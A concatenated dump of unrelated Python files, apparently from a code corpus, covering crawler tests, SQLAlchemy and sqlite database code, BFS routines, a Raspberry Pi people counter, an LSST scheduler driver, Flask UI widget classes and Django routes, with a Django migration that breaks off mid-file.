# In[7]:
def quadratic_root_finder(a, b, c):
    '''
    Applies the quadratic equation to find the roots of a quadratic function
    specified by the formula ax^2 + bx + c = 0.
    To be implemented efficiently by someone else!
    '''
    pass  # deliberate body-less placeholder illustrating the `pass` keyword
# ## Function Testing
# Each function is itself a small-scale "program"
# * It has inputs
# * It has expected outputs or side-effects
# * Ideally, it is a self-contained "black box" (does not manipulate global variables)
# It makes sense to test each function independently
# * Correctness can be verified before it is used in a larger scale application
# A *test-driver* is a short program that tests a specific function
#
# ## TODO
# 1. Read chapter 3 in the textbook.
# 1. Work on PA2
#
# ## Next Lesson
# Debugging programs and function practice!
|
19,753 | 2f1b2a0c94c115d8feb6719ffbed5020308fccf2 | import unittest
from general import *
class Test_General(unittest.TestCase):
    """Integration-style tests for the crawler helpers imported from `general`.

    NOTE(review): these tests share the on-disk directory 'elective_dummy'
    and are order-dependent (test_write_file relies on the file created by
    test_create_data_files) — confirm before shuffling or parallelizing.
    """

    def test_create_project_directory(self):
        """create_project_directory() must create the directory on disk."""
        directory = 'elective_dummy'
        create_project_directory(directory)  # testing this method
        self.assertTrue(os.path.exists(directory),
                        'did not create directory: ' + directory)

    def test_create_data_files(self):
        """create_data_files() must create the queue, crawled and contents files."""
        project_name = 'elective_dummy'
        base_url = 'https://clbokea.github.io/exam/'
        queue = project_name + "/queue.txt"
        crawled = project_name + "/crawled.txt"
        contents = project_name + "/contents.md"
        create_data_files(project_name, base_url)  # testing this method
        self.assertTrue(os.path.exists(queue), 'did not create file: ' + queue)
        self.assertTrue(os.path.exists(crawled), 'did not create file: ' + crawled)
        self.assertTrue(os.path.exists(contents), 'did not create file: ' + contents)

    def test_write_file(self):
        """write_file() must write exactly the given data to the file."""
        project_name = 'elective_dummy'
        path = project_name + "/contents.md"
        data = 'this is some test data'
        write_file(path, data)  # testing this method
        # `with` closes the handle deterministically (it was left open before).
        with open(path, "r") as f:
            resultData = f.read()
        # Bug fix: the failure message used to print `data` twice instead of
        # the value actually read back.
        self.assertEqual(resultData, data, 'did not write correctly to file, expected: ' + data + ' got: ' + resultData)

    def test_add_md_formatting(self):
        """add_md_formatting() must convert tag-prefixed scrape strings to
        markdown and drop the ignorable paragraph variants."""
        header1Tag = 'h1im a header tag'
        header1TagResult = '\n# im a header tag\n'
        header2Tag = 'h2im a header2 tag'
        header2Tag_result = '\n## im a header2 tag'
        ## p tags tests
        ptag = 'pim a p tag'
        ptag_result = 'im a p tag '
        ## p tags to ignore
        p_tag_pNote = 'pNote im a pNote tag'
        p_tag_pAssignment = 'pAssignment im a pAssignment'
        p_tag_pre = 'pre< im a pre< tag'
        p_tag_pHashtag = 'p# im a p#'
        litag = 'liim a li tag'
        litag_result = '\n* im a li tag'
        atag = 'aim a a tag'
        atag_result = 'im a a tag'
        contents = [header1Tag, header2Tag, ptag, litag, atag,
                    p_tag_pNote, p_tag_pAssignment, p_tag_pre, p_tag_pHashtag]
        formatted_list = add_md_formatting(contents)
        # Bug fix: the "Got:" part of each message used to show the *input*
        # (contents[i]) rather than the actual formatted output.
        self.assertEqual(formatted_list[0], header1TagResult, 'did not format correctly. \nExpected: ' + header1TagResult + '\nGot: ' + formatted_list[0])
        self.assertEqual(formatted_list[1], header2Tag_result, 'did not format correctly. \nExpected: ' + header2Tag_result + '\nGot: ' + formatted_list[1])
        self.assertEqual(formatted_list[2], ptag_result, 'did not format correctly. \nExpected: ' + ptag_result + '\nGot: ' + formatted_list[2])
        self.assertEqual(formatted_list[3], litag_result, 'did not format correctly. \nExpected: ' + litag_result + '\nGot: ' + formatted_list[3])
        self.assertEqual(formatted_list[4], atag_result, 'did not format correctly. \nExpected: ' + atag_result + '\nGot: ' + formatted_list[4])
        self.assertNotIn(p_tag_pNote, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pNote + '\nShould not be added to the list.')
        self.assertNotIn(p_tag_pAssignment, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pAssignment + '\nShould not be added to the list.')
        self.assertNotIn(p_tag_pre, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pre + '\nShould not be added to the list.')
        self.assertNotIn(p_tag_pHashtag, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pHashtag + '\nShould not be added to the list.')
if __name__ == '__main__':
unittest.main() |
19,754 | bb9a46af854732c6f9c514b63b13f8caf1098640 | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
# Connection URL assembled from environment variables so credentials never
# live in source control. Missing variables default to '' (connection will
# then fail at connect time, not import time).
# NOTE(review): port 3308 is non-standard for MySQL (default 3306) —
# presumably a tunnel/container port mapping; confirm against deployment.
SQLALCHEMY_DATABASE_URL: str = 'mysql+pymysql://{0}:{1}@{2}:3308/{3}'.format( # noqa: E501
    os.environ.get('DB_USERNAME', ''),
    os.environ.get('DB_PASSWORD', ''),
    os.environ.get('DB_HOST', ''),
    os.environ.get('DB_SCHEMA', '')
)
# pool_pre_ping probes each pooled connection before checkout so stale
# connections are transparently recycled instead of erroring mid-request.
Engine = create_engine(
    SQLALCHEMY_DATABASE_URL,
    pool_pre_ping=True
)
# Session factory: callers must commit/flush explicitly.
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=Engine)
# Declarative base class for ORM models.
Base = declarative_base()
def get_session():
    """Yield a database session and guarantee it is closed afterwards.

    Generator-style dependency: the caller iterates it, uses the yielded
    session, and the ``finally`` block closes it even if the caller raises.
    """
    # Create the session *before* entering the try block: previously, if
    # SessionLocal() itself raised inside the try, the finally block hit a
    # NameError on the unbound `session`, masking the real failure.
    session = SessionLocal()
    try:
        yield session
    finally:
        session.close()
|
19,755 | 7e49e4a1c05a42e2b2338612b068002b8de53781 | import sqlite3
# Print the top three per-species maximum base-experience values from the
# local pokedex database.
connection = sqlite3.connect('pokedex.db')
cursor = connection.cursor()
cursor.execute('''SELECT max(base_experience),species_id FROM POKEMON GROUP BY species_id ORDER BY base_experience DESC LIMIT 3;''')
for base_experience, _species_id in cursor.fetchall():
    print(base_experience)
connection.commit()  # no-op for a SELECT; kept for identical behavior
connection.close()
|
19,756 | 95b99d5d49aff9141e06078d75419d7ab2db092e |
def bfs01(N, E, s, INF=10**10):
    """Unweighted single-source shortest distances via breadth-first search.

    Parameters
    ----------
    N : number of vertices, labelled 0..N-1
    E : adjacency list; E[i] lists the vertices connected to i
    s : start vertex
    INF : sentinel distance marking unreachable vertices

    Returns the full distance list; unreachable vertices keep INF.
    """
    from collections import deque
    dist = [INF] * N
    dist[s] = 0
    frontier = deque([s])
    while frontier:
        u = frontier.popleft()
        step = dist[u] + 1
        for nb in E[u]:
            if dist[nb] == INF:  # not visited yet
                dist[nb] = step
                frontier.append(nb)
    return dist
def bfs02(N, E, s, g, INF=10**10):
    """BFS shortest path length from ``s`` to ``g``.

    Parameters
    ----------
    N : number of vertices, labelled 0..N-1
    E : adjacency list; E[i] lists the vertices connected to i
    s : start vertex
    g : goal vertex
    INF : sentinel distance marking unreachable vertices

    Returns the number of edges on a shortest s->g path as an ``int``.
    If g is never reached (unreachable, or g == s), falls through and
    returns the whole distance list instead — callers must handle both
    return types (quirk kept for backward compatibility).

    Bug fix: the ``INF`` parameter was previously shadowed by a hard-coded
    ``INF = 10**10`` inside the body, so a caller-supplied sentinel was
    silently ignored.
    """
    from collections import deque
    V = [INF] * N
    d = deque([s])
    V[s] = 0
    while d:
        v = d.popleft()
        now = V[v]
        for w in E[v]:
            if V[w] < INF:
                continue  # already visited
            if w == g:
                # First time we reach g is along a shortest path.
                return now + 1
            V[w] = now + 1
            d.append(w)
    return V
|
19,757 | e009846595ca9371ff2c77cc905a22792eeefe28 | import RPi.GPIO as GPIO
import time
# Bidirectional people counter using two IR motion sensors on pins 7 and 11.
# The order in which the two beams trigger determines the direction of
# travel (increment vs decrement).
# NOTE(review): Python 2 syntax (`print` statements) — this script will not
# run under Python 3 as-is.
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.IN) #Read output from IR motion sensor
GPIO.setup(11, GPIO.IN) #Read output from IR motion sensor
count = 0 #Total count of persons
both_high = 0 #Flag equals 1 when both sensors in HIGH state
isIncreased = 0 #Flag equals 1 when count increased
isDecreased = 0 #Flag equals 1 when count decreased
while True:
    k=GPIO.input(11)
    i=GPIO.input(7)
    # Correction pass: if both sensors were simultaneously HIGH on the
    # previous iteration, a prior increment/decrement may have been double
    # counted; undo it when the corresponding sensor drops back LOW.
    if both_high:
        if k==0 and isIncreased:
            count = count-1
            print "Intruders decrease(Both sensors were blocked) =",count
            time.sleep(.5)
        if i==0 and isDecreased:
            count = count+1
            print "Intruders increase(Both sensors were blocked) =",count
            time.sleep(.5)
    if k and i: #If both sensor values HIGH then check the values again
        both_high = 1
        continue
    j=0
    both_high = 0
    isIncreased = 0
    isDecreased = 0
    #i=GPIO.input(7)
    # Sensor 11 fired first: wait up to 2 s for sensor 7 to confirm the
    # crossing, then count it as an exit (decrement).
    if k==1: #When output from 1st motion sensor is LOW
        t_end=time.time()+2
        while time.time()<t_end:
            j=GPIO.input(7)
            if j==1: #When output from 2nd motion sensor is LOW
                count=count-1
                isDecreased = 1
                time.sleep(.5)
                break
        if isDecreased:
            print "Intruders decrease =",count
        time.sleep(0.1)
    # Sensor 7 fired first: wait up to 2 s for sensor 11 to confirm the
    # crossing, then count it as an entry (increment).
    elif i==1: #When output from 2nd motion sensor is HIGH
        t_end=time.time()+2
        while time.time()<t_end:
            j=GPIO.input(11)
            if j==1: #When output from 1st motion sensor is LOW
                count=count+1
                isIncreased = 1
                time.sleep(.5)
                break
        if isIncreased:
            print "Intruders increase =",count
        time.sleep(0.1)
|
19,758 | f546d59e8ae5aa969ee552c619f79870775ab97e | # This file is part of ts_scheduler
#
# Developed for the LSST Telescope and Site Systems.
# This product includes software developed by the LSST Project
# (https://www.lsst.org).
# See the COPYRIGHT file at the top-level directory of this distribution
# for details of code ownership.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
import io
import logging
import os
import types
import typing
from dataclasses import dataclass
import pandas
from lsst.ts import observing
from .driver_target import DriverTarget
from .observation import Observation
from .survey_topology import SurveyTopology
__all__ = ["Driver", "DriverParameters"]
WORDY = logging.DEBUG - 5
@dataclass
class DriverParameters:
    """Global configuration parameters for the scheduler driver.

    Subclass this (in the same module as the concrete ``Driver``) and
    replace ``Driver.parameters`` when a scheduling algorithm needs extra
    configuration such as file paths.
    """

    # Sun elevation (degrees) defining the night boundary.
    night_boundary: float = -12.0
    # Moon phase threshold used for "new moon" handling.
    new_moon_phase_threshold: float = 20.0

    def setDefaults(self) -> None:
        """Reset both parameters to the LSST Scheduler Driver defaults."""
        self.night_boundary = DriverParameters.night_boundary
        self.new_moon_phase_threshold = DriverParameters.new_moon_phase_threshold
class Driver:
    """The Scheduler Driver is the module that normalizes the interface between
    any scheduling algorithm to the LSST Scheduler CSC. The interface
    implements three main behaviours; configure an underlying algorithm,
    request targets and register successful observations.

    If the Scheduler algorithm requires a specific set of parameters the user
    must subclass `DriverParameters`, in the same module as the `Driver`, and
    add the appropriate parameters using the LSST pexConfig module.

    Access to the telemetry stream and models are also interfaced by `Driver`.
    The full list of default available telemetry data is shown in the
    scheduler_csc module. Nevertheless, the full list of telemetry may vary
    depending on the models used. The user has control over this while
    configuring the Scheduler CSC.

    Parameters
    ----------
    models: `dict`
        A dictionary with models available for the scheduling algorithm.
    raw_telemetry: `dict`
        A dictionary with available raw telemetry.
    observing_blocks : dict[str, observing.ObservingBlock]
        Observing blocks.
    parameters: `DriverParameters`, optional
        Input functional parameters for the scheduling algorithm.
    log: `Logger`
        Parent logger class.

    Attributes
    ----------
    log: `Logger`
        Logger class.
    parameters: `DriverParameters`
        Store functional driver parameters.
    models: `dict`
        Dictionary with models.
    raw_telemetry: `dict`
        Dictionary with raw telemetry data.
    targetid: `int`
        Counter of the number of targets generated by the scheduler since it
        was last instantiated.
    observing_blocks : dict[str, observing.ObservingBlock]
        Observing blocks.
    stop_tracking_script_name: `str`
        Name of a SAL Script that can be used to stop the observatory. This is,
        in general, queued by the Driver when it fails to select an
        observation.
    stop_tracking_script_is_standard: `bool`
        Specify if the stop tracking script is standard.
    is_night: `bool`
        Track if it is night time.
    night: `int`
        Count the number of nights from the start of the survey.
    current_sunset: `float`
        Timestamp for the current sunset.
    current_sunrise: `float`
        Timestamp for the current sunrise.
    """

    def __init__(
        self,
        models: dict[str, typing.Any],
        raw_telemetry: dict[str, typing.Any],
        observing_blocks: dict[str, observing.ObservingBlock],
        parameters: DriverParameters | None = None,
        log: logging.Logger | None = None,
    ) -> None:
        # Attach to the parent logger when one is provided so log records
        # propagate through the CSC's logging hierarchy.
        if log is None:
            self.log = logging.getLogger(type(self).__name__)
        else:
            self.log = log.getChild(type(self).__name__)
        if parameters is None:
            self.parameters = DriverParameters()
        else:
            self.parameters = parameters
        self.models = models
        self.raw_telemetry = raw_telemetry
        self.targetid = 0
        self.observing_blocks = observing_blocks
        # Filled in by get_survey_topology() during configuration.
        self.stop_tracking_script_name = None
        self.stop_tracking_script_is_standard = None
        # is_night=None means "not initialized yet"; update_conditions()
        # computes the first night boundaries on that sentinel.
        self.is_night = None
        self.night = 1
        self.current_sunset = None
        self.current_sunrise = None

    def configure_scheduler(self, config: types.SimpleNamespace) -> SurveyTopology:
        """This method is responsible for running the scheduler configuration
        and returning the survey topology, which specifies the number, name
        and type of projects running by the scheduler.

        By default it will just return a test survey topology.

        Parameters
        ----------
        config : `types.SimpleNamespace`
            Configuration, as described by ``schema/Scheduler.yaml``

        Returns
        -------
        survey_topology : ``SurveyTopology``
            Survey topology.

        Raises
        ------
        RuntimeError
            If ``config`` has no ``driver_configuration`` section.
        """
        # Bug fix: validate the configuration *before* reading from it. The
        # original accessed config.driver_configuration first, so a missing
        # section raised AttributeError instead of the intended RuntimeError.
        if not hasattr(config, "driver_configuration"):
            raise RuntimeError(
                "No driver_configuration section defined in configuration."
            )
        if "parameters" in config.driver_configuration:
            for parameter in config.driver_configuration["parameters"]:
                value = config.driver_configuration["parameters"][parameter]
                self.log.debug(f"Setting driver parameter: {parameter} = {value}")
                setattr(
                    self.parameters,
                    parameter,
                    value,
                )
        return self.get_survey_topology(config)

    def get_survey_topology(self, config: types.SimpleNamespace) -> SurveyTopology:
        """Get the survey topology.

        Parameters
        ----------
        config : `types.SimpleNamespace`
            Configuration, as described by ``schema/Scheduler.yaml``

        Returns
        -------
        survey_topology : ``SurveyTopology``
            Survey topology.
        """
        survey_topology = SurveyTopology()
        survey_topology.general_propos = config.driver_configuration.get(
            "general_propos", []
        )
        survey_topology.sequence_propos = config.driver_configuration.get(
            "sequence_propos", []
        )
        survey_topology.num_general_props = len(survey_topology.general_propos)
        survey_topology.num_seq_props = len(survey_topology.sequence_propos)
        # These two keys are mandatory; a KeyError here indicates an invalid
        # driver configuration.
        self.stop_tracking_script_name = config.driver_configuration[
            "stop_tracking_observing_script_name"
        ]
        self.stop_tracking_script_is_standard = config.driver_configuration[
            "stop_tracking_observing_script_is_standard"
        ]
        return survey_topology

    def cold_start(self, observations: list[Observation]) -> None:
        """Rebuilds the internal state of the scheduler from a list of
        observations.

        Parameters
        ----------
        observations : `list`[`Observation`]
            List of observations.
        """
        raise NotImplementedError("Cold start is not implemented.")

    def update_conditions(self) -> None:
        """Update driver internal conditions.

        When subclassing this method, make sure to call it at the start of the
        method, as it performs operations like running the observatory through
        the current targets on the queue.
        """
        self.log.debug("Updating conditions.")
        self.models["sky"].update(self.models["observatory_state"].time)
        if self.is_night is None:
            self.log.debug("Driver not initialized yet. Computing night parameters.")
            # Driver was not initialized yet. Need to compute night
            # boundaries
            (self.current_sunset, self.current_sunrise) = self.models[
                "sky"
            ].get_night_boundaries(self.parameters.night_boundary)
            self.is_night = (
                self.current_sunset
                <= self.models["observatory_state"].time
                < self.current_sunrise
            )
            self.log.debug(
                f"Sunset/Sunrise: {self.current_sunset}/{self.current_sunrise}, "
                f"sun @ {self.parameters.night_boundary} degrees."
            )
        # Keep the previous value to detect a night -> day transition below.
        is_night = self.is_night
        self.is_night = (
            self.current_sunset
            <= self.models["observatory_state"].time
            < self.current_sunrise
        )
        # Only compute night boundaries when we transition from nighttime to
        # daytime. Possibilities are:
        # 1 - self.is_night=True and is_night = True: During the night (no need
        # to compute anything).
        # 2 - self.is_night=False and is_night = True: Transitioned from
        # night/day (need to recompute night boundaries).
        # 3 - self.is_night=True and is_night = False: Transitioned from
        # day/night (no need to compute anything).
        # 4 - self.is_night=False and is_night = False: During the day, no need
        # to compute anything.
        if not self.is_night and is_night:
            self.log.debug(
                "Night over. Computing next night boundaries. "
                f"Assuming sun elevation of {self.parameters.night_boundary}."
            )
            self.night += 1
            (self.current_sunset, self.current_sunrise) = self.models[
                "sky"
            ].get_night_boundaries(self.parameters.night_boundary)
            self.log.debug(
                f"[{self.night}]: Sunset/Sunrise: {self.current_sunset}/{self.current_sunrise} "
            )

    def select_next_target(self) -> DriverTarget:
        """Picks a target and returns it as a target object.

        By default it will just return a dummy test target.

        Returns
        -------
        `DriverTarget`
        """
        self.log.log(WORDY, "Selecting next target.")
        self.targetid += 1
        target = DriverTarget(
            observing_block=next(iter(self.observing_blocks.values())),
            targetid=self.targetid,
        )
        target.num_exp = 2
        target.exp_times = [15.0, 15.0]
        target.num_props = 1
        target.propid_list = [0]
        return target

    def select_next_targets(self) -> list[DriverTarget]:
        """Select a list of targets.

        By default it will just return a dummy test target.

        Returns
        -------
        `list` [`DriverTarget`]
        """
        return [self.select_next_target()]

    def register_observed_target(self, target: DriverTarget) -> Observation:
        """Validates observed target and returns an observation.

        Parameters
        ----------
        target : `DriverTarget`
            Observed target to register.

        Returns
        -------
        `Observation`
            Registered observation.
        """
        self.log.log(WORDY, "Registering target %s.", target)
        return target.get_observation()

    def register_observation(self, target: DriverTarget) -> None:
        """Register observations.

        This method should store the observation in a way that can be retrieved
        afterwards by the driver.

        The default implementation is not implemented.

        Parameters
        ----------
        target : `DriverTarget`
            Observation to register.
        """
        self.register_observed_target(target=target)

    def get_stop_tracking_target(self) -> DriverTarget:
        """Build a target whose only script stops observatory tracking.

        Uses the stop-tracking script configured via get_survey_topology().
        """
        stop_tracking_block = observing.ObservingBlock(
            name="StopTracking",
            program="_Internal",
            constraints=[],
            scripts=[
                observing.ObservingScript(
                    name=self.stop_tracking_script_name,
                    standard=self.stop_tracking_script_is_standard,
                    parameters=dict(),
                )
            ],
        )
        target = DriverTarget(
            observing_block=stop_tracking_block,
            targetid=self.targetid,
        )
        return target

    def load(self, config: str) -> None:
        """Load a modifying configuration.

        The input is a file that the Driver must be able to parse. It should
        contain that the driver can parse to reconfigure the current scheduler
        algorithm. For instance, it could contain new targets to add to a queue
        or project.

        Each Driver must implement its own load method. This method just checks
        that the file exists.

        Parameters
        ----------
        config : `str`
            Configuration to load

        Raises
        ------
        RuntimeError:
            If input configuration file does not exists.
        """
        if not os.path.exists(config):
            raise RuntimeError(f"Input configuration file {config} does not exist.")

    def save_state(self) -> None:
        """Save the current state of the scheduling algorithm to a file.

        Returns
        -------
        filename: `str`
            The name of the file with the state.
        """
        # Typo fix in the error message ("is is" -> "is").
        raise NotImplementedError("Save state is not implemented.")

    def parse_observation_database(self, filename: str) -> None:
        """Parse an observation database into a list of observations.

        Parameters
        ----------
        filename : `str`

        Returns
        -------
        observations : `list` of `DriverTarget`
        """
        raise NotImplementedError("Parse observation database not implemented.")

    def get_state_as_file_object(self) -> io.BytesIO:
        """Get the current state of the scheduling algorithm as a file object.

        Returns
        -------
        file_object : `io.BytesIO`
            File object with the current.
        """
        raise NotImplementedError("Get state as file object not implemented.")

    def reset_from_state(self, filename: str) -> None:
        """Load the state from a file."""
        raise NotImplementedError("Reset from state is not implemented.")

    def assert_survey_observing_script(self, survey_name: str) -> None:
        """Assert that the input survey name has a dedicated observing script.

        Parameters
        ----------
        survey_name : `str`
            Name of the survey.

        Raises
        ------
        AssertError:
            If `survey_name` is not in the list of valid survey observing
            scripts.
        """
        assert survey_name in self.observing_blocks, (
            f"{survey_name} not in the list of observing blocks. "
            f"Currently defined are: {set(self.observing_blocks.keys())}"
        )

    def get_survey_observing_block(self, survey_name: str) -> observing.ObservingBlock:
        """Return the appropriate survey observing block.

        Parameters
        ----------
        survey_name : `str`
            Name of the survey.

        Returns
        -------
        observing.ObservingBlock
            Survey observing block.
        """
        self.assert_survey_observing_script(survey_name=survey_name)
        # Deep copy so callers can mutate the block without corrupting the
        # driver's registry.
        return self.observing_blocks[survey_name].copy(deep=True)

    def convert_efd_observations_to_targets(
        self, efd_observations: pandas.DataFrame
    ) -> typing.List[DriverTarget]:
        """Convert EFD dataframe into list of driver targets.

        Parameters
        ----------
        efd_observations : `pandas.DataFrame`
            Data frame returned from a query to the EFD for observations.
        """
        observations = []
        for observation_data_frame in efd_observations.iterrows():
            observations.append(
                self._get_driver_target_from_observation_data_frame(
                    observation_data_frame=observation_data_frame
                )
            )
        return observations

    def _get_driver_target_from_observation_data_frame(
        self, observation_data_frame: typing.Tuple[pandas.Timestamp, pandas.Series]
    ) -> DriverTarget:
        """Convert an observation data frame into a DriverTarget.

        Parameters
        ----------
        observation_data_frame : `tuple` [`pandas.Timestamp`, `pandas.Series`]
            One ``(index, row)`` item as yielded by ``DataFrame.iterrows()``.
        """
        # Bug fix: iterrows() yields (index, Series) tuples; the original
        # string-indexed the tuple itself ("targetId"), which raises
        # TypeError. Unpack the row first.
        _, observation = observation_data_frame
        # NOTE(review): default_observing_script_name/-is_standard are not
        # set in __init__ — presumably provided by subclasses; confirm.
        return DriverTarget(
            observing_script_name=self.default_observing_script_name,
            observing_script_is_standard=self.default_observing_script_is_standard,
            targetid=observation["targetId"],
        )
|
19,759 | 38f320ae9fa07e1a90e2f7dff964fda215cf6222 | from flask import Flask
from flask import render_template
import os
from os import path
import json
import csv
# This file defines the UI elements that can be made.
inputDataPath = "input.json"


def flatten(l):
    """Flatten one level of nesting: [[a, b], [c]] -> [a, b, c].

    Replaces the former named lambda (PEP 8 E731) with a proper `def`.
    """
    return [item for sublist in l for item in sublist]
class UIElement:
    """Base class for UI controls bound to a field on a host object.

    Reads the initial value from the host's instance ``__dict__`` and can
    invoke a named callback (``onupdate``) on the host after changes.
    """

    def __init__(self, fieldname, classname, uiname, onupdate, myclass):
        self.fieldname = fieldname
        self.uiname = uiname
        self.onupdate = onupdate
        self.classname = classname
        self.myclass = myclass
        # Snapshot the bound field's current value for rendering.
        self.value = myclass.__dict__[fieldname]

    def performUpdate(self):
        """Invoke the host's update callback, if one was registered."""
        if self.onupdate is not None:
            callback = getattr(self.myclass, self.onupdate)
            callback()
class Switch(UIElement):
    """Boolean toggle control bound to a bool field on the host object."""

    def __init__(self, fieldname, classname, uiname, myclass, onupdate):
        super().__init__(fieldname, classname, uiname, onupdate, myclass)

    def getInstructions(self):
        """Render spec consumed by the client UI."""
        return ["switch", self.classname, self.uiname, self.value]

    def updateValue(self, _):
        """Flip the bound field; the incoming value is ignored."""
        current = self.myclass.__dict__[self.fieldname]
        self.myclass.__dict__[self.fieldname] = not current
class Slider(UIElement):
    """Numeric range control bound to a float field on the host object."""

    def __init__(self, fieldname, classname, uiname, min, max, myclass, onupdate):
        super().__init__(fieldname, classname, uiname, onupdate, myclass)
        # Range bounds shipped to the client for rendering.
        self.min = min
        self.max = max

    def getInstructions(self):
        """Render spec consumed by the client UI."""
        spec = ["slider", self.classname, self.uiname]
        spec += [self.min, self.max, self.value]
        return spec

    def updateValue(self, value):
        """Coerce the incoming (string) value to float and store it."""
        self.myclass.__dict__[self.fieldname] = float(value)
class Button():
    """Clickable UI element: a click invokes ``onclick`` on the host object.

    Not derived from UIElement because a button carries no bound value, but
    it mirrors the same getInstructions/updateValue interface.
    """

    def __init__(self, classname, uiname, myclass, onclick):
        self.classname = classname
        self.uiname = uiname
        self.myclass = myclass
        self.onclick = onclick

    def performUpdate(self):
        """Run the click callback if one was registered."""
        if self.onclick is not None:
            getattr(self.myclass, self.onclick)()

    def getInstructions(self):
        """Render spec consumed by the client UI."""
        return ["button", self.classname, self.uiname]

    def updateValue(self, value):
        """No-op: buttons have no value (interface parity with UIElement)."""
        pass
class Dropdown(UIElement):
    """Selection control mapping display labels to underlying option values.

    ``options`` holds the raw values written back to the bound field;
    ``optionlabels`` holds the matching labels shown to the user.
    """

    def __init__(self, fieldname, classname, uiname, myclass, options, optionlabels, onupdate):
        UIElement.__init__(self, fieldname, classname, uiname, onupdate, myclass)
        # Lists don't compare equal to tuple options (e.g. after a JSON
        # round-trip), so normalize to tuple before looking the value up.
        if isinstance(self.value, (list,)):
            self.value = tuple(self.value)
        try:
            self.value = optionlabels[options.index(self.value)]
        except (ValueError, IndexError):
            # Bug fix: was a bare `except:`, which also swallowed unrelated
            # errors (KeyboardInterrupt included). Only the "value not among
            # options / label list too short" cases should fall back here:
            # pick the label of the first option with the same type.
            for i, option in enumerate(options):
                if type(option) == type(self.value):
                    self.value = optionlabels[i]
        self.options = options
        self.optionlabels = optionlabels
        # Maybe also execute some callback in myclass

    def getInstructions(self):
        """Render spec consumed by the client UI."""
        return ["dropdown", self.classname, self.uiname, self.value] + self.optionlabels

    def updateValue(self, label):
        """Translate the chosen label back to its option value and store it."""
        self.myclass.__dict__[self.fieldname] = self.options[self.optionlabels.index(label)]
class AddingFigure():
    """Streaming figure: each update *appends* one sample per y-series.

    A synthetic clock (``t``, stepping 0.01 per update) serves as the
    x-axis. ``xfieldName`` and ``xname`` are accepted but unused here —
    kept for interface parity with ReplacingFigure.
    """

    def __init__(self, myclass, xfieldName, yFieldNames, xname, ynames):
        self.xfieldname = xfieldName
        self.yfieldnames = yFieldNames
        self.myclass = myclass
        self.ynames= ynames
        self.updatePol = "Add"
        self.t = 0
        self.y = [self.myclass.__dict__[name] for name in self.yfieldnames]

    def updateValues(self):
        """Advance the clock and re-sample the tracked host fields."""
        self.t += 0.01
        self.y = [self.myclass.__dict__[name] for name in self.yfieldnames]

    def getInstructions(self):
        """Full figure spec for the client (initial render)."""
        header = ["figure", 0, len(self.y), self.updatePol, "Time"]
        return header + self.ynames + [self.t] + self.y

    def getUpdateInstructions(self):
        """One appended sample: [n_x, n_y, t, y0, y1, ...]."""
        self.updateValues()
        return [1, len(self.y), self.t] + self.y
class ReplacingFigure():
    """Figure whose entire data set is *replaced* on every update.

    Both x and the y-series are re-read from the host object's fields each
    time, unlike AddingFigure which appends samples.
    """

    def __init__(self, myclass, xfieldName, yFieldNames, xname, ynames):
        self.xfieldname = xfieldName
        self.yfieldnames = yFieldNames
        self.xname = xname
        self.myclass = myclass
        self.ynames= ynames
        self.updatePol = "Replace"
        self.updateValues()

    def updateValues(self):
        """Re-read the x series and all y series from the host's fields."""
        self.x = self.myclass.__dict__[self.xfieldname]
        self.y = [self.myclass.__dict__[yFieldName] for yFieldName in self.yfieldnames]

    def getInstructions(self):
        """Full figure spec for the client (initial render).

        Fix: removed a stray debug ``print`` of the flattened y-data that
        spammed stdout on every render.
        """
        yflat = flatten(self.y)
        return ["figure", len(self.x), len(self.y), self.updatePol, self.xname] + self.ynames + list(self.x) + yflat

    def getUpdateInstructions(self):
        """Replacement payload: [n_x, n_y, x..., y... (flattened)]."""
        self.updateValues()
        # A way to also update x may need to be added in the future.
        return [len(self.x), len(self.y)] + list(self.x) + flatten(self.y)
|
19,760 | 5035bd63b6313f31d525fb6247d2218c7864be96 | from django.urls import include, path
from authen import views
# Route table for the authen app.
# NOTE(review): the postsign/postcreate routes presumably receive the
# submitted login/signup forms — confirm against authen/views.py.
urlpatterns = [
    path('login', views.login, name='login'),
    path('signup', views.signup, name='signup'),
    path('postsign', views.postsign, name='postsign'),
    path('create', views.create, name="create"),
    path('postcreate', views.postcreate, name="postcreate")
]
|
19,761 | ddf29c3f29117e7243361ec426938d88ac31bc9d | # Generated by Django 2.0.4 on 2018-04-07 20:12
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import iioy.core.fields
class Migration(migrations.Migration):
    """Initial schema for the movies app (auto-generated by Django 2.0.4).

    NOTE: generated file — keep edits to comments only; schema changes
    belong in a new migration.
    """
    initial = True
    dependencies = [
    ]
    # Tables are created first; cross-table FKs, M2Ms and indexes are
    # attached afterwards so forward references resolve.
    operations = [
        migrations.CreateModel(
            name='CastMember',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('character_name', models.TextField(null=True)),
                ('order', models.PositiveIntegerField(default=0)),
            ],
            options={
                'ordering': ('order',),
            },
        ),
        migrations.CreateModel(
            name='Genre',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('tmdb_id', models.TextField()),
                ('name', models.TextField()),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Movie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
